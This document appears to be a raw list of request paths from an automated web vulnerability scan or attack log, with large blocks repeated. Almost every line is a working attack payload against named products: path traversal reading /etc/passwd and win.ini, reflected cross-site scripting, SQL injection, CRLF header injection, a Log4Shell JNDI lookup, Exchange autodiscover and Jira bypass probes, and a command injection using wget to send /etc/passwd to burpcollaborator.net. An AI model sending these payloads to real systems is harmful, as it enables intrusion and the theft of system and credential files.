/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/device.rsp?opt=user&cmd=list
/web/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/web/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/wp-json/buddypress/v1/signup
/web/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
\..\..\..\..\Windows\win.ini
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/ghost/preview
/web/auth/requestreset
/web/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1
/web/ReportServer/Pages/ReportViewer.aspx
/web/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/tests/support/stores/test_grid_filter.php?query=phpinfo();
/web/verify.php?id=1&confirm_hash=
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/api/snapshots
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/ReportServer/Pages/ReportViewer.aspx
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/ghost/preview
/web/auth/requestreset
/web/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
/web/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/api/snapshots
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/verify.php?id=1&confirm_hash=
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/web/does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x
/web/casa/nodes/thumbprints
/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)
/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//
/web/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/web/share/page/dologin
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/mantis/verify.php?id=1&confirm_hash=
/web/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0
/web/search/
/web/mailingupgrade.php
/web/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x
/web/casa/nodes/thumbprints
/web/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)
/web/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//
/web/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/web/share/page/dologin
/web/mantis/verify.php?id=1&confirm_hash=
/web/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0
/web/search/
/web/mailingupgrade.php
/web/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/mantisBT/verify.php?id=1&confirm_hash=
/web/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/web/bugs/verify.php?confirm_hash=&id=1
/web/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://
/web/lumis/portal/controller/xml/PageControllerXml.jsp
/web/carbon/generic/save_artifact_ajaxprocessor.jsp
/web/?x=${jndi:ldap://127.0.0.1
